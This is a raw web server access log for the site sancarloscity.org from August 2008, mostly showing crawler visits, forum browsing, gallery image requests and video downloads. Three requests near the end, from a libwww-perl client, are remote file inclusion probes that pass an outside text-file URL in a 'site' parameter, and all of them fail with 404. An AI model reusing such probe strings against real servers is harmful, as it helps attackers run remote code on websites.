218.186.9.4 - - [28/Aug/2008:06:23:32 -0700] "GET /forum2/uploads/1182562075/med_gallery_279_28_30212.jpg HTTP/1.1" 200 46901 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=224" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:23:32 -0700] "GET /forum2/uploads/1182562075/tn_gallery_279_28_2289.jpg HTTP/1.1" 200 3522 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=224" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:23:32 -0700] "GET /forum2/uploads/1182562075/tn_gallery_279_28_9301.jpg HTTP/1.1" 200 5278 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=224" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:23:32 -0700] "GET /forum2/index.php?act=task HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=224" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:23:43 -0700] "GET /classifieds/index.php?method=create_form&list=classifiedsuser&rollid=187&fromlist=advertisement&frommethod=showdetails&fromid=187&fromfromlist=classifiedscategory&fromfrommethod=showhtmllist&fromfromid=170 HTTP/1.0" 200 5804 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
67.195.37.186 - - [28/Aug/2008:06:23:46 -0700] "GET /eatndine.htm HTTP/1.0" 200 23616 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:23:58 -0700] "GET /pictures/plaza/?S=A HTTP/1.0" 200 535 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
193.138.94.10 - - [28/Aug/2008:06:24:17 -0700] "GET /sampo/flv/073008/6.flv HTTP/1.0" 200 6692959 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "www.sancarloscity.org"
82.99.30.12 - - [28/Aug/2008:06:24:55 -0700] "GET /jodera2/viewtopic.php?p=1538&sid=b1e033b6bad92697a6483ade1b4de124 HTTP/1.0" 200 30936 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:25:09 -0700] "GET /forum2/index.php?showtopic=182&pid=1097&mode=threaded&show=&st=0 HTTP/1.0" 200 5933 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:26:17 -0700] "GET /forum2/index.php?act=findpost&pid=1263 HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:26:23 -0700] "GET /forum2/index.php?s=c0d5f272d52ba6539d4d77f84b903154&showtopic=203&st=0&p=1263& HTTP/1.0" 200 8412 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:26:31 -0700] "GET /forum2/index.php?act=Search&nav=au&CODE=show&searchid=e7b67fd14e0286345eaec901fe7941ec&search_in=posts&result_type=posts&hl=&st=25 HTTP/1.0" 200 3018 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
66.249.67.220 - - [28/Aug/2008:06:26:35 -0700] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:26:35 -0700] "GET /jodera2/index.php HTTP/1.0" 200 61474 "http://www.sancarloscity.org/jodera2/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
82.99.30.44 - - [28/Aug/2008:06:26:43 -0700] "GET /jodera2/viewforum.php?f=2&sid=b1e033b6bad92697a6483ade1b4de124 HTTP/1.0" 200 31570 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:26:44 -0700] "GET /jodera2/viewforum.php?f=1&sid=4968312346e253c0f1952301ae589ca5 HTTP/1.0" 200 83636 "http://www.sancarloscity.org/viewforum.php?f=1&sid=4968312346e253c0f1952301ae589ca5" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:26:45 -0700] "GET /forum2/index.php?act=findpost&pid=1421 HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:26:50 -0700] "GET /jodera2/login.php HTTP/1.0" 200 12333 "http://www.sancarloscity.org/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:26:51 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:26:52 -0700] "GET /jodera2/index.php?sid=4968312346e253c0f1952301ae589ca5 HTTP/1.0" 200 54936 "http://www.sancarloscity.org/jodera2/index.php?sid=4968312346e253c0f1952301ae589ca5" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:26:54 -0700] "GET /forum2/index.php?s=81c48e608ad95fdaf426344c986ef64b&showtopic=213&st=0&p=1421& HTTP/1.0" 200 11091 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:26:55 -0700] "GET /jodera2/viewforum.php?f=1 HTTP/1.0" 200 83682 "http://www.sancarloscity.org/viewforum.php?f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
193.138.94.10 - - [28/Aug/2008:06:27:00 -0700] "GET /sampo/flv/073008/7.flv HTTP/1.0" 200 19517144 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:27:01 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 41358 "http://www.sancarloscity.org/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:27:08 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11432 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:27:22 -0700] "GET /picgallery/displayimage.php?album=7&pid=64&slideshow=5000 HTTP/1.0" 200 7831 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:27:57 -0700] "GET /picgallery/displayimage.php?album=18&pid=211&slideshow=5000 HTTP/1.0" 200 8644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
82.99.30.63 - - [28/Aug/2008:06:28:03 -0700] "GET /jodera2/viewforum.php?f=19&sid=b1e033b6bad92697a6483ade1b4de124 HTTP/1.0" 200 28705 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:28:44 -0700] "GET /picgallery/displayimage.php?album=lastup&cat=1&pos=0 HTTP/1.0" 200 35360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
124.106.187.61 - - [28/Aug/2008:06:28:55 -0700] "GET /demolaybacolod HTTP/1.1" 301 107 "http://demolaybacolod.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.14;MEGAUPLOAD 1.0" "www.sancarloscity.org"
124.106.187.61 - - [28/Aug/2008:06:28:56 -0700] "GET /demolaybacolod/ HTTP/1.1" 200 1191 "http://demolaybacolod.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.14;MEGAUPLOAD 1.0" "www.sancarloscity.org"
124.106.187.61 - - [28/Aug/2008:06:28:56 -0700] "GET /demolaybacolod/front.jpg HTTP/1.1" 200 109093 "http://www.sancarloscity.org/demolaybacolod/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.14;MEGAUPLOAD 1.0" "www.sancarloscity.org"
124.106.187.61 - - [28/Aug/2008:06:28:57 -0700] "GET /demolaybacolod/indexx.html HTTP/1.1" 200 20611 "http://www.sancarloscity.org/demolaybacolod/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.14;MEGAUPLOAD 1.0" "www.sancarloscity.org"
124.106.187.61 - - [28/Aug/2008:06:28:59 -0700] "GET /demolaybacolod/images/line.jpg HTTP/1.1" 200 13443 "http://www.sancarloscity.org/demolaybacolod/indexx.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.14;MEGAUPLOAD 1.0" "www.sancarloscity.org"
124.106.187.61 - - [28/Aug/2008:06:28:59 -0700] "GET /demolaybacolod/images/picsintro.jpg HTTP/1.1" 200 48371 "http://www.sancarloscity.org/demolaybacolod/indexx.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.14;MEGAUPLOAD 1.0" "www.sancarloscity.org"
124.106.187.61 - - [28/Aug/2008:06:28:59 -0700] "GET /demolaybacolod/images/featured4.jpg HTTP/1.1" 200 81241 "http://www.sancarloscity.org/demolaybacolod/indexx.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.14;MEGAUPLOAD 1.0" "www.sancarloscity.org"
124.106.187.61 - - [28/Aug/2008:06:28:59 -0700] "GET /demolaybacolod/catalino.gif HTTP/1.1" 200 54526 "http://www.sancarloscity.org/demolaybacolod/indexx.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.14;MEGAUPLOAD 1.0" "www.sancarloscity.org"
124.106.187.61 - - [28/Aug/2008:06:28:59 -0700] "GET /demolaybacolod/w7.jpg HTTP/1.1" 200 25682 "http://www.sancarloscity.org/demolaybacolod/indexx.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.14;MEGAUPLOAD 1.0" "www.sancarloscity.org"
124.106.187.61 - - [28/Aug/2008:06:28:59 -0700] "GET /demolaybacolod/images/g.jpg HTTP/1.1" 200 90503 "http://www.sancarloscity.org/demolaybacolod/indexx.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.14;MEGAUPLOAD 1.0" "www.sancarloscity.org"
124.106.187.61 - - [28/Aug/2008:06:29:00 -0700] "GET /demolaybacolod/images/38.jpg HTTP/1.1" 200 97753 "http://www.sancarloscity.org/demolaybacolod/indexx.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.14;MEGAUPLOAD 1.0" "www.sancarloscity.org"
124.106.187.61 - - [28/Aug/2008:06:29:01 -0700] "GET /demolaybacolod/images/annivpm.jpg HTTP/1.1" 200 93616 "http://www.sancarloscity.org/demolaybacolod/indexx.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.14;MEGAUPLOAD 1.0" "www.sancarloscity.org"
124.106.187.61 - - [28/Aug/2008:06:29:02 -0700] "GET /demolaybacolod/images/garde.jpg HTTP/1.1" 200 101236 "http://www.sancarloscity.org/demolaybacolod/indexx.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.14;MEGAUPLOAD 1.0" "www.sancarloscity.org"
124.106.187.61 - - [28/Aug/2008:06:29:03 -0700] "GET /demolaybacolod/images/insta.jpg HTTP/1.1" 200 92385 "http://www.sancarloscity.org/demolaybacolod/indexx.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.14;MEGAUPLOAD 1.0" "www.sancarloscity.org"
124.106.187.61 - - [28/Aug/2008:06:29:03 -0700] "GET /demolaybacolod/images/grand.jpg HTTP/1.1" 200 103189 "http://www.sancarloscity.org/demolaybacolod/indexx.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.14;MEGAUPLOAD 1.0" "www.sancarloscity.org"
124.106.187.61 - - [28/Aug/2008:06:29:04 -0700] "GET /demolaybacolod/images/cleanup.jpg HTTP/1.1" 200 121082 "http://www.sancarloscity.org/demolaybacolod/indexx.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.14;MEGAUPLOAD 1.0" "www.sancarloscity.org"
124.106.187.61 - - [28/Aug/2008:06:29:05 -0700] "GET /demolaybacolod/images/ancom.jpg HTTP/1.1" 200 88816 "http://www.sancarloscity.org/demolaybacolod/indexx.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.14;MEGAUPLOAD 1.0" "www.sancarloscity.org"
124.106.187.61 - - [28/Aug/2008:06:29:10 -0700] "GET /demolaybacolod/images/html_04.jpg HTTP/1.1" 200 2489 "http://www.sancarloscity.org/demolaybacolod/indexx.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.14;MEGAUPLOAD 1.0" "www.sancarloscity.org"
124.106.187.61 - - [28/Aug/2008:06:29:10 -0700] "GET /demolaybacolod/images/html_02.jpg HTTP/1.1" 200 105406 "http://www.sancarloscity.org/demolaybacolod/indexx.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.14;MEGAUPLOAD 1.0" "www.sancarloscity.org"
124.106.187.61 - - [28/Aug/2008:06:29:11 -0700] "GET /demolaybacolod/images/html_05.jpg HTTP/1.1" 200 2476 "http://www.sancarloscity.org/demolaybacolod/indexx.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.14;MEGAUPLOAD 1.0" "www.sancarloscity.org"
124.106.187.61 - - [28/Aug/2008:06:29:12 -0700] "GET /demolaybacolod/images/html_06.jpg HTTP/1.1" 200 3371 "http://www.sancarloscity.org/demolaybacolod/indexx.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.14;MEGAUPLOAD 1.0" "www.sancarloscity.org"
124.106.187.61 - - [28/Aug/2008:06:29:12 -0700] "GET /demolaybacolod/images/html_07.jpg HTTP/1.1" 200 1798 "http://www.sancarloscity.org/demolaybacolod/indexx.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.14;MEGAUPLOAD 1.0" "www.sancarloscity.org"
124.106.187.61 - - [28/Aug/2008:06:29:13 -0700] "GET /demolaybacolod/images/html_08.jpg HTTP/1.1" 200 2411 "http://www.sancarloscity.org/demolaybacolod/indexx.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.14;MEGAUPLOAD 1.0" "www.sancarloscity.org"
124.106.187.61 - - [28/Aug/2008:06:29:13 -0700] "GET /demolaybacolod/images/html_09.jpg HTTP/1.1" 200 2519 "http://www.sancarloscity.org/demolaybacolod/indexx.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.14;MEGAUPLOAD 1.0" "www.sancarloscity.org"
124.106.187.61 - - [28/Aug/2008:06:29:13 -0700] "GET /demolaybacolod/images/html_10.jpg HTTP/1.1" 200 5988 "http://www.sancarloscity.org/demolaybacolod/indexx.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.14;MEGAUPLOAD 1.0" "www.sancarloscity.org"
193.138.94.10 - - [28/Aug/2008:06:29:16 -0700] "GET /sampo/flv/071908/1.flv HTTP/1.0" 200 7439464 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:29:22 -0700] "GET /forum2/index.php?showtopic=213&mode=linear&view=findpost&p=1421 HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:29:23 -0700] "GET /forum2/index.php?s=733ca6d8a14c91c927304e2b7ac882d9&showtopic=213&st=0&p=1421& HTTP/1.0" 200 11091 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
120.28.215.239 - - [28/Aug/2008:06:29:45 -0700] "GET /forum2/index.php HTTP/1.0" 200 37325 "http://www.sancarloscity.org/forum2/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
120.28.215.239 - - [28/Aug/2008:06:29:57 -0700] "GET /forum2/index.php?s=b79d434e76fdcd8898986a1b9de4613b&showforum=9 HTTP/1.0" 200 62050 "http://www.sancarloscity.org/forum2/index.php?s=b79d434e76fdcd8898986a1b9de4613b&showforum=9" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
120.28.215.239 - - [28/Aug/2008:06:30:07 -0700] "GET /forum2/index.php?act=post&do=new_post&f=9 HTTP/1.0" 200 9901 "http://www.sancarloscity.org/forum2/index.php?act=post&do=new_post&f=9" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
120.28.215.239 - - [28/Aug/2008:06:30:09 -0700] "GET /forum2/index.php?act=Reg&CODE=00&coppa_pass=1 HTTP/1.0" 200 10146 "http://www.sancarloscity.org/forum2/index.php?act=Reg&CODE=00&coppa_pass=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
120.28.215.239 - - [28/Aug/2008:06:30:10 -0700] "POST /forum2/index.php?act=Reg&coppa_user=0&termsread=1&coppa_pass=1 HTTP/1.0" 200 19269 "http://www.sancarloscity.org/forum2/index.php?act=Reg&CODE=00&coppa_pass=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
120.28.215.239 - - [28/Aug/2008:06:30:15 -0700] "GET /forum2/index.php?act=Reg&CODE=image&rc=1871196cc7aca58ed2bfcd93992eb805 HTTP/1.0" 200 4209 "http://www.sancarloscity.org/forum2/index.php?act=Reg&CODE=00&coppa_pass=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
120.28.215.239 - - [28/Aug/2008:06:30:20 -0700] "POST /forum2/index.php HTTP/1.0" 200 19619 "http://www.sancarloscity.org/forum2/index.php?act=Reg&CODE=00&coppa_pass=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:30:23 -0700] "GET /forum2/index.php?act=Post&CODE=02&f=15&t=213&qpid=1496 HTTP/1.0" 200 2906 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
120.28.215.239 - - [28/Aug/2008:06:30:26 -0700] "GET /forum2/index.php?act=Reg&CODE=image&rc=03b11ea3e92c9920e36f5eafe44d0a33 HTTP/1.0" 200 4124 "http://www.sancarloscity.org/forum2/index.php?act=Reg&CODE=00&coppa_pass=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
120.28.215.239 - - [28/Aug/2008:06:30:30 -0700] "POST /forum2/index.php HTTP/1.0" 200 19619 "http://www.sancarloscity.org/forum2/index.php?act=Reg&CODE=00&coppa_pass=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
120.28.215.239 - - [28/Aug/2008:06:30:31 -0700] "GET /forum2/index.php?act=Reg&CODE=00&coppa_pass=1 HTTP/1.0" 200 10146 "http://www.sancarloscity.org/forum2/index.php?act=Reg&CODE=00&coppa_pass=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
120.28.215.239 - - [28/Aug/2008:06:30:33 -0700] "GET /forum2/index.php?act=Reg&CODE=image&rc=8608e1612c6ab5c90c67357f327b81ed HTTP/1.0" 200 3759 "http://www.sancarloscity.org/forum2/index.php?act=Reg&CODE=00&coppa_pass=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
120.28.215.239 - - [28/Aug/2008:06:30:36 -0700] "POST /forum2/index.php HTTP/1.0" 200 19619 "http://www.sancarloscity.org/forum2/index.php?act=Reg&CODE=00&coppa_pass=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
120.28.215.239 - - [28/Aug/2008:06:30:40 -0700] "GET /forum2/index.php?act=Reg&CODE=00&coppa_pass=1 HTTP/1.0" 200 10146 "http://www.sancarloscity.org/forum2/index.php?act=Reg&CODE=00&coppa_pass=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
120.28.215.239 - - [28/Aug/2008:06:30:42 -0700] "GET /forum2/index.php?act=Reg&CODE=image&rc=ebc4882e453309109e064a7c9d077774 HTTP/1.0" 200 4083 "http://www.sancarloscity.org/forum2/index.php?act=Reg&CODE=00&coppa_pass=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
120.28.215.239 - - [28/Aug/2008:06:30:46 -0700] "POST /forum2/index.php HTTP/1.0" 200 19619 "http://www.sancarloscity.org/forum2/index.php?act=Reg&CODE=00&coppa_pass=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
208.111.154.15 - - [28/Aug/2008:06:30:49 -0700] "GET /robots.txt HTTP/1.0" 200 44 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sancarloscity.org"
208.111.154.16 - - [28/Aug/2008:06:30:49 -0700] "GET /carmels HTTP/1.1" 301 100 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sancarloscity.org"
208.111.154.16 - - [28/Aug/2008:06:30:50 -0700] "GET /carmels/ HTTP/1.1" 200 8529 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:31:04 -0700] "GET /forum2/index.php?showtopic=213&mode=linearplus&view=findpost&p=1421 HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:31:11 -0700] "GET /forum2/index.php?s=38856884acd2b196809fd95c2aa4976c&showtopic=213&st=0&p=1421& HTTP/1.0" 200 11091 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
193.138.94.10 - - [28/Aug/2008:06:31:33 -0700] "GET /sampo/flv/071908/2.flv HTTP/1.0" 200 14667682 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:31:58 -0700] "GET /classifieds/index.php?method=login_form&list=classifiedsuser&rollid=217&fromlist=advertisement&frommethod=showdetails&fromid=217&fromfromlist=classifiedscategory&fromfrommethod=showhtmllist&fromfromid=27 HTTP/1.0" 200 5805 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
64.1.215.166 - - [28/Aug/2008:06:32:05 -0700] "GET /jodera2/privmsg.php?mode=post&u=867 HTTP/1.0" 302 0 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.sancarloscity.org"
87.101.4.49 - - [28/Aug/2008:06:32:22 -0700] "GET /logs/access_080809.log/index.php?site=http://www.amimeats.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 768 "-" "libwww-perl/5.79" "www.sancarloscity.org"
87.101.4.49 - - [28/Aug/2008:06:32:22 -0700] "GET /index.php?site=http://www.amimeats.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 758 "-" "libwww-perl/5.79" "www.sancarloscity.org"
87.101.4.49 - - [28/Aug/2008:06:32:22 -0700] "GET /logs/index.php?site=http://www.amimeats.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 763 "-" "libwww-perl/5.79" "www.sancarloscity.org"
74.6.18.233 - - [28/Aug/2008:06:32:29 -0700] "GET /qphotogallery/thumbnails.php?album=13&page=1&sort=na HTTP/1.0" 200 25823 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:32:44 -0700] "GET /jodera2/index.php HTTP/1.0" 200 61474 "http://www.sancarloscity.org/jodera2/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:32:48 -0700] "GET /jodera2/viewforum.php?f=1&sid=3d009f9d76281d803264a0c1f9542ad2 HTTP/1.0" 200 83624 "http://www.sancarloscity.org/viewforum.php?f=1&sid=3d009f9d76281d803264a0c1f9542ad2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "www.sancarloscity.org"
